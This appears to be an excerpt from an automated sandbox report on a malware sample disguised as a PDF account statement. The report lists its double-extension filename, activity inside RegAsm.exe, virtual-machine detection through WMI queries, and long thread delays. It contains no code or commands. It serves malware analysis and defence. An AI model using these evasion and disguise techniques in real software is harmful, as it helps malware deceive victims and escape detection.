                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00E50C6D push edi; retf 3_2_00E50C7A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00E50C45 push ebx; retf 3_2_00E50C52
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00E50C53 push ebx; retf 3_2_00E50C52
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061D940A pushfd ; retf 3_2_061D9419
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061DB521 push es; ret 3_2_061DB530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061D7052 push es; ret 3_2_061D7060

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Uses an obfuscated file name to hide its real file extension (double extension)
                        Source: Possible double extension: pdf.exeStatic PE information: hesaphareketi-01.pdf.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeMemory allocated: 2367D880000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 25C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599090Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598093Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597093Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596967Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596859Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596750Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596639Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596510Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596310Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596078Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595652Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595219Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594218Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594109Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7449Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2397Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -599875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -599765s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -599656s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -599547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -599422s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -599312s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -599203s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -599090s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -598984s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -598875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -598765s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -598656s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -598547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -598422s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -598312s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -598203s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -598093s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -597984s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -597875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -597765s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -597656s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -597547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -597422s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -597312s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -597203s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -597093s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -596967s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -596859s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -596750s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -596639s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -596510s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -596310s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -596078s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -595652s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -595547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -595437s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -595328s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -595219s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -595094s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -594984s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -594875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -594765s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -594656s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -594547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -594437s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -594328s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -594218s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -594109s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5744Thread sleep time: -594000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341E24C0 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF7341E24C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599656Jump to behavior
